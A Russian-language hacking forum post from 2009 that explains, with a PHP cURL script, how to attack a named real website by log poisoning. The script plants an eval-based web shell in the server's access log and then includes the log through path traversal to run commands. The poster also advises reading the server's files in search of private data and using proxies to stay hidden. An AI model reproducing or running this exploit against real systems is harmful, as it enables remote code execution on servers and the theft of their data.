Показать сообщение отдельно

  #2  
Старый 16.12.2009, 02:38
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

) Грины заманали прикалываться

1. Одновременная запись данных юзер-агента в лог и их инклуд не прокатят - последовательно только
2. Где ты увидел в логах данные user-agent-ов? Там только ip и get-ы урлов.
3. Соответственно сначала get с php-кодом в строке URL, затем (второй раз вызов фукнции) уже инклуд

PHP код:
<?  
@set_time_limit(0);  
@
ini_set("display_errors","1"); 
  function 
get($url)  
    {  
        
$ch curl_init();    
        
curl_setopt($chCURLOPT_URL,$url);  
        
curl_setopt($chCURLOPT_RETURNTRANSFER,1);  
        
curl_setopt($chCURLOPT_USERAGENT'Opera');  
        
curl_setopt($chCURLOPT_REFERER"http://www.KAKASHKA.ru"); 
        
$ss=curl_exec($ch);  
        
curl_close($ch);  
        return 
$ss;  
    }  


      
$a=get('http://www.impan.pl/~ecmtb11/index.php?file=<?eval(stripslashes($_REQUEST[cmd]));?>');  
      
$a=get('http://www.impan.pl/~ecmtb11/index.php?file=../../../../var/apache/logs/www.access_log&cmd=phpinfo();');
      echo 
$a
      
#echo 'ok'; 
?>
в общем чото в этом роде, логи там мегов на 25 по-моему, но сегодня туда уже ничего не пишется. Ну и про прокси не забывай, кхм

PS: А вообще там нет инклуда, там fopen, но схема предоженная выше работает когда есть инклуд. Тут просто читалка файлов. Так что читай, ищи превад

Шутку с тильдой оценил)

Последний раз редактировалось Pashkela; 16.12.2009 в 02:46..
 
Ответить с цитированием